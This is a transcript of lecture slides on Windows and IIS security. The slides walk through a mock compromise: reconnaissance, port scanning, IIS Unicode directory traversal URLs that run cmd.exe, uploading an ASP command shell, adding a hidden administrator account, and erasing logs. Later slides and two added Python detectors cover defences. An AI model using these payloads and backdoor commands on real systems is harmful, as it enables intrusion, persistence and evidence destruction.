Transcript
Page 1: Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security Matthew Cook

Slide 1

Windows Security Analysis
Computer Science E-Commerce Security

Matthew Cook
http://escarpment.net/


Slide 2

Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Janet Web Cache Service
http://wwwcache.ja.net/


Slide 3

Windows Security Analysis

Introduction
Step-by-step Machine Compromise
Preventing Attack
Further Reading
The Future


Slide 4

Introduction

Physical Security
Security Threats
“Hacker” or “Cracker”
The Easiest Security Improvement
Can you buy security?


Slide 5

Physical Security

Secure Location
BIOS restrictions
Password Protection
Boot Devices
Case Locks
Case Panels


Slide 6

Security Threats

Denial of Service
Theft of information
Modification
Fabrication (Spoofing or Masquerading)


Slide 7

Security Threats…

Why a compromise can occur:
Physical Security Holes
Software Security Holes
Incompatible Usage Security Holes
Social Engineering
Complacency


Slide 8

“Hacker” or “Cracker”

“Hacker” is used primarily by the media to describe malicious attacks by individuals.

However, the computing community uses “Cracker” to mean the same.

A “Hacker” tinkers with systems for good purposes (not breaking the law).

To avoid confusion many people now say “A machine has been compromised!”, not “A machine has been hacked!”


Slide 9

The Easiest Security Improvement

Good passwords
Usernames and Passwords are the primary security defence
Use a password that is easy to type to avoid ‘Shoulder Surfers’
Use the first letters from song titles, song lyrics or film quotations


Slide 10

Can you buy Security?

“This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?”

Bruce Schneier


Slide 11

Step-by-step Machine Compromise

Background
Gathering Information
Identifying System Weakness
Exploiting the Security Hole
Gaining ‘Root’
Backdoor Access
System Alteration
Audit Trail Removal


Slide 12

Background

Reasons for Attack:
Personal Issues
Political Statement
Financial Gain (Theft of money, information)
Learning Experience
DoS (Denial of Service)
Support for Illegal Activity

In our scenario we are going to attack the company laggyband.com


Slide 13

Gathering Information

Companies House
Internet Search
URL: http://www.google.co.uk
Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain


Slide 14

Gathering Information…

Use Nslookup or dig
dig @dns.laggyband.com www.laggyband.com
Different query types available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings


Slide 15

Identifying System Weakness

Many products available:
Nmap
Nessus
Pandora
Pwdump
L0pht Crack
Null Authentication


Slide 16

Nmap

Port Scanning Tool
Stealth scanning, OS Fingerprinting
Open Source
Runs under Unix based OS
Port development for Win32
URL: http://www.insure.org/nmap/


Slide 17

Nmap


Slide 18

Nessus

Remote security scanner similar to Typhon
Very comprehensive
Frequently updated modules
Testing of DoS attacks
Open Source
Win32 and Java Client
URL: http://nessus.org/


Slide 19

Pandora

Not strictly Windows Security
Runs on either Unix or Win32
Excellent tool to evaluate Netware security
Open Source
Lots of additional information
URL: http://www.nmrc.org/pandora/


Slide 20

pwdump

Version 3 (e = encrypted)
Developed by Phil Staubs and Erik Hjelmstad
Based on pwdump and pwdump2
URL: http://www.ebiz-tech.com/html/pwdump.html
Needs Administrative Privileges
Extracts hashes even if syskey is installed
Extracts from remote machines
Identifies accounts with no password
Self contained utility


Slide 21

L0pht Crack

Password Auditing and Recovery
Crack Passwords from many sources
Registration $249
URL: http://www.atstake.com/research/lc3/


Slide 22

L0pht Crack

Crack Passwords from:
Local Machine
Remote Machine
SAM File
SMB Sniffer
PWDump file


Slide 23

Nmap Analysis

nmap -sP 158.125.0.0/16
Dependent on ICMP (Internet Control Message Protocol)
nmap -sP -PT80 158.125.0.0/16
Dependent on TCP SYN/ACK packet


Slide 24

Nmap Analysis…

TCP Connect Scan
Completes a ‘Three Way Handshake’
Very noisy (Detection by IDS)


Slide 25

Nmap Analysis…

TCP SYN Scan
Half open scanning (Full port TCP connection not made)
Less noisy than the TCP Connect Scan


Slide 26

Nmap Analysis…

TCP FIN Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works on UNIX based TCP/IP Stacks

TCP Xmas Tree Scan
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports

TCP Null Scan
– Turns off all flags
– RST returned for all closed ports

UDP Scan
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
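The scan types on slides 24 to 26 are defined by which TCP flags the probe carries and how a closed port answers. The following is an added example (not code from the slides or from Nmap) that classifies probes by flag set, infers port state from the reply the way the slides describe, and flags sources that touch many ports with stealth probes, the kind of check an IDS such as Snort performs. Packet records, IP addresses and the port threshold are constructed for the example.

```python
"""Classify TCP scan probes and flag stealth port scans in a packet log.

Added example; not part of the original slides. It models SYN (half open),
FIN, Xmas (FIN+URG+PSH) and Null (no flags) probes from a constructed list
of (src_ip, dst_ip, dst_port, flags) records.
"""
from collections import defaultdict
from typing import Optional

# TCP flag bits as laid out in the TCP header flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags: int) -> Optional[str]:
    """Name the scan type an unsolicited packet with these flags suggests.

    Packets carrying ACK belong to an established connection or are the
    third step of a normal handshake, so they are never treated as probes.
    """
    if flags & ACK:
        return None
    if flags == 0:
        return "null"            # Null scan: every flag turned off
    if flags == FIN | URG | PSH:
        return "xmas"            # Xmas Tree scan: FIN, URG and PUSH lit up
    if flags == FIN:
        return "fin"             # FIN scan
    if flags == SYN:
        return "syn"             # SYN (half open) scan, or a normal connect
    return None


def infer_port_state(scan_type: str, reply_flags: Optional[int]) -> str:
    """Port state as the scanner would infer it from the target's reply.

    reply_flags is None when the target stayed silent. For FIN/Xmas/Null
    probes a closed port answers RST and an open port says nothing on an
    RFC 793 stack; Windows stacks reply RST either way, which is why the
    slides say these scans mostly work against UNIX based stacks.
    """
    if scan_type == "syn":
        if reply_flags is None:
            return "filtered"
        if reply_flags & RST:
            return "closed"
        if reply_flags & SYN and reply_flags & ACK:
            return "open"
        return "unknown"
    # fin, xmas, null
    if reply_flags is None:
        return "open|filtered"
    return "closed" if reply_flags & RST else "unknown"


def detect_scans(packets, port_threshold: int = 5):
    """Group probes by (source IP, scan type) and report sources that hit
    at least port_threshold distinct destination ports with that probe.

    Returns {(src_ip, scan_type): sorted list of ports}.
    """
    ports = defaultdict(set)
    for src, _dst, dport, flags in packets:
        kind = classify_probe(flags)
        if kind is not None:
            ports[(src, kind)].add(dport)
    return {key: sorted(p) for key, p in ports.items() if len(p) >= port_threshold}


# Constructed sample traffic (documentation address ranges, not real hosts).
SCANNER, TARGET, CLIENT = "203.0.113.5", "192.0.2.10", "198.51.100.7"
SAMPLE_PACKETS = (
    [(SCANNER, TARGET, p, FIN | URG | PSH) for p in (21, 22, 23, 25, 80, 443)]  # Xmas scan, 6 ports
    + [(SCANNER, TARGET, p, 0) for p in (135, 139, 445)]                       # Null probes, below threshold
    + [(CLIENT, TARGET, 80, SYN), (CLIENT, TARGET, 80, ACK), (CLIENT, TARGET, 80, PSH | ACK)]  # normal web client
)

if __name__ == "__main__":
    for (src, kind), hit in detect_scans(SAMPLE_PACKETS).items():
        print(f"{src}: {kind} scan against ports {hit}")
    print("FIN probe, RST reply ->", infer_port_state("fin", RST | ACK))
    print("FIN probe, no reply  ->", infer_port_state("fin", None))
```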


Slide 27

Null Authentication

Null Authentication:
Net use \\camford\IPC$ “” /u:“”
Famous tools like ‘Red Button’
Net view \\camford
List of Users, groups and shares
Last logged on date
Last password change
Much more…


Slide 28

Exploiting the Security Hole

Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Displays the listing of c: in browser

Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce servers


Slide 29

Gaining ‘Root’

Cmdasp.asp provides a cmd shell in the SYSTEM context

Increase in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)
Version 2 coded by Foundstone
http://camford/scripts/idq.dll?
Patch Bulletin: MS01-26
NOT included in Windows 2000 SP2


Slide 30

Backdoor Access

Create several user accounts
Net user iisservice <pass> /ADD
Net localgroup administrators iisservice /ADD
Add root shells on high end ports
Tiri is 3Kb in size
Add backdoors to ‘Run’ registry keys


Slide 31

System Alteration

Web page alteration
Information Theft
Enable services
Add VNC

Creating a Warez Server
Net start msftpsvc
Check access
Upload file 1Mb in size
Advertise as a warez server


Slide 32

Audit Trail Removal

Many machines have auditing disabled
Main problems are IIS logs
DoS IIS before logs sync to disc
Erase logs from hard disc
Erasing Eventlog harder

IDS Systems
Network Monitoring at firewall


Slide 33

Preventing Attack

NetBIOS/SMB Services
Hfnetchk and Qchain
SNMP Vulnerabilities
Active Directory Vulnerabilities
IPSec
IIS Security
IDS – Snort
.NET Server


Slide 34

NetBIOS/SMB Services

NetBIOS Browsing Request [UDP 137]
NetBIOS Browsing Response [UDP 138]
NetBIOS Communications [TCP 135]
CIFS [TCP 139, 445 UDP 445]
Port 445 Windows 2000 only
Block ports at firewall
Netstat -A


Slide 35

NetBIOS/SMB Services…

To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window


Slide 36

NetBIOS/SMB Services…

Disable Null Authentication
Key similar to Windows NT 4.0
HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
REG_DWORD set to 0, 1 or 2!
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
REG_DWORD set to 0 or 1


Slide 37

Hfnetchk

Use Hfnetchk to check hot fixes
Checks machines against Microsoft XML
Automate the process using batch files and a mail client (Postie)
URL: http://www.infradig.com/infradig/postie/
Use QChain to chain hot fixes together without rebooting in-between.


Slide 38

Hfnetchk…

Patch details for:
Windows NT 4.0, 2000, XP, .NET server
IIS 4, IIS 5 and IIS 6
SQL Server 7.0
SQL Server 2000
Internet Explorer 5.01 (and later)


Slide 39

Hfnetchk…

Default scan of local host (Pre downloaded)
hfnetchk -x mssecure.xml

Default scan of lboro domain
hfnetchk -d lboro

Verbose scan of local host
hfnetchk -v -x mssecure.xml

Verbose scan including installed hot fixes
hfnetchk -v -a b -x mssecure.xml


Slide 40

SNMP Vulnerabilities

Simple Network Management Protocol
Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
SNMP Utilities in Resource Kit
Turn off SNMP services
Set community names
Set accepted hosts


Slide 41

SNMP Vulnerabilities…


Slide 42

SNMP Vulnerabilities…

CERT Advisory “Tuesday 12th February”
Privilege Escalation, DoS, Instability
Block UDP 161 and 162 at firewall
Patch or disable SNMP
Patches available for Windows 2000 and XP
URL: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp


Slide 43

AD Vulnerabilities

Listing of AD contents using ldp.exe
Ldp is contained on the Resource Kit
Authenticated connection needed
Filter TCP 389 (LDAP) and 3268 (GC)
DNS – Securing Zone Transfers to Slave Name servers only


Slide 44

IPSec

IP security
Linux Connectivity using FreeS/WAN
Mainly for wireless use
WEP encryption cracked
URL: http://www.freeswan.org/
URL: http://airsnort.sourceforge.net/


Slide 45

IIS Security

History
Recent Worms
IIS Lock Down Tool
URL Scan
The Future


Slide 46

IIS History

IIS 2.0 Installed by NT 4.0
IIS 3.0 followed by more common IIS 4.0
Quickly gained reputation for (in)security
IIS 5.0 Installed by Windows 2000
IIS 6.0 Installed by .NET Server
Microsoft releases Hfnetchk
Closely followed by IIS Lockdown and URLScan


Slide 47

Recent Worms

Sadmind/IIS – Directory Traversal (Unicode Exploit)
CodeRed – ida/idq buffer overflow
CodeGreen – ida/idq buffer overflow
Nimda – Directory Traversal (Unicode Exploit)


Slide 48

Sadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -


Slide 49

IIS Lock Down Tool

Automatic ‘Lock Down’ [Now 2nd version]
Locks down IIS 4.0 and IIS 5.0
Express ‘lock down’ for simple web sites
Custom ‘lock down’ for more complex servers
Undo facility to reverse last ‘lock down’
URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362


Slide 50

IIS Lock Down Tool…

Disable:
Active Server Pages
Index Server Interface
Server Side Includes
Internet Data Connector
Internet Printing
HTR Scripting

Remove:
Sample Web Files
Script Virtual Directory
MSADC Directory
WebDAV

Set Permissions on:
Exe files
Content Directories


Slide 51

URL Scan

ISAPI filter scans incoming HTTP requests
Filtered based on rule set
New rules easily added
Default urlscan.ini suitable for static pages
Restart service when changes made
404 and logged request for matched rules
URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571


Slide 52

URL Scan…

Filter on:
The request method (verb)
File Extension
URL Encoding
Non ASCII characters
Malicious character sequence
Headers in HTTP GET
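The URLScan checks listed above (URL encoding, non-ASCII characters, file extension, malicious character sequences) are what catch the Unicode traversal requests of slide 28 and the Sadmind/IIS log entry of slide 48. The following is an added example (not code from the slides, from URLScan or from Microsoft) that applies those checks to W3C extended IIS log lines: it percent-decodes the URI stem, also decoding the overlong UTF-8 forms (%c0%af, %c1%9c) that the vulnerable IIS versions accepted as path separators, normalises the path, and reports requests that escape the web root, carry non-ASCII bytes, or name a denied extension. The log lines, IP addresses and the extension deny list are constructed for the example.

```python
"""Flag IIS Unicode/directory traversal requests in W3C extended log lines.

Added example; not part of the original slides. Log line fields assumed:
date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query
sc-status cs(User-Agent), as in the Sadmind/IIS entry on the slides.
"""
import posixpath
from urllib.parse import unquote_to_bytes

# Constructed deny list in the spirit of URLScan's DenyExtensions section.
DENY_EXTENSIONS = {".exe", ".dll", ".bat", ".cmd", ".com"}


def decode_overlong(raw: bytes) -> str:
    """Turn percent-decoded bytes into text, accepting the overlong two-byte
    UTF-8 sequences (%c0%af -> '/', %c1%9c -> '\\') that a strict decoder
    rejects but unpatched IIS 4/5 treated as path separators."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # one byte, one code point; enough for path checks
            i += 1
    return "".join(out)


def normalize(stem: str):
    """Decode and canonicalise a URI stem.

    Returns (normalised path, non_ascii, escaped_root): non_ascii is True if
    the decoded bytes contain anything >= 0x80, escaped_root is True if a
    '..' segment climbs above the web root after decoding."""
    raw = unquote_to_bytes(stem)
    non_ascii = any(b >= 0x80 for b in raw)
    path = decode_overlong(raw).replace("\\", "/")   # IIS accepts both separators
    segments, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True                        # climbed above the web root
            continue
        segments.append(seg)
    return "/" + "/".join(segments), non_ascii, escaped


def check_request(line: str) -> dict:
    """Apply the URLScan-style checks to one W3C extended log line."""
    fields = line.split()
    if len(fields) < 9:
        raise ValueError("unexpected log line layout: " + line)
    c_ip, stem = fields[2], fields[7]
    path, non_ascii, escaped = normalize(stem)
    ext = posixpath.splitext(path)[1].lower()
    return {
        "c_ip": c_ip,
        "path": path,
        "traversal": escaped,
        "non_ascii": non_ascii,
        "executable": ext in DENY_EXTENSIONS,
    }


def scan_log(lines):
    """Return the check results for every line that trips at least one rule."""
    results = (check_request(line) for line in lines if line.strip())
    return [r for r in results if r["traversal"] or r["non_ascii"] or r["executable"]]


# Constructed log lines (documentation address ranges); the first two mirror
# the request shapes shown on slides 28 and 48.
SAMPLE_LOG = [
    "2001-05-03 22:34:49 203.0.113.8 - 192.0.2.80 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -",
    "2001-05-03 22:34:50 203.0.113.8 - 192.0.2.80 80 GET /scripts/root.exe /c+echo+x>../wwwroot/default.htm 200 -",
    "2001-05-03 22:35:01 198.51.100.3 - 192.0.2.80 80 GET /index.htm - 200 -",
    "2001-05-03 22:35:02 198.51.100.3 - 192.0.2.80 80 GET /images/..%2f..%2flogo.gif - 404 -",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```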


Slide 53

The Future

Gartner report recommends ditching IIS
Rewrite of IIS on the cards for version 6
Lock Down Tool (Interim Measures)
Httpd functionality in the kernel (TechEd)
IIS Lockdown included in SP3
Further implications for .NET


Slide 54

IDS Snort

IDS – Intrusion Detection System
Libpcap packet sniffer and logger
Originally developed for the Unix platforms
Open Source
Port to Win32 available (Release 1.8.1)
Installation on Win32 in under 30 minutes
Run on your IIS server or standalone


Slide 55

IDS Snort…

Snort can detect:
Stealth Port Scans
CGI Attacks
Front Page Extensions Attacks
ICMP Activity
SMTP Activity
SQL Activity
SMB Probes


Slide 56

IDS Snort…

Default logging to snort\logs\alert.ids
Log to mySQL and SQL Server
Notification as logs, ‘winpopup’, email etc
SnortSnaf or ACID (PHP Based)
GUI – IDS Center
URL: http://snort.sourcefire.com/
URL: http://www.cert.org/kb/acid/
URL: http://www.silicondefense.com/


Slide 57

Snort…


Slide 58

.NET Server


Slide 59

.NET Server…

          Web Server   Standard Server   Enterprise Server   Datacenter Server
RAM       2Gb          4Gb               64Gb                128Gb
CPU       2            2                 8                   32
Cluster   N/A          N/A               4 node              8 node
64-bit    N/A          N/A               Yes                 Yes
Notes     WWW          SOHO              Large Site          OEM Only


Slide 60

.NET Server…

Mainly improvements in AD and Management
Blank passwords at console only
Improved command line tools
Evaluating Security on build 3590
IIS Currently secure from install
Auditing enabled by default
Integrated change log
XML Output


Slide 61

.NET Server…


Slide 62

.NET Server…


Slide 63

.NET Server…


Slide 64

.NET Server…


Slide 65

.NET Server…


Slide 66

Further Reading

Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0471253111]
Hacking Exposed Series, McGraw Hill
Security Focus
Bugtraq
Google


Slide 67

Questions
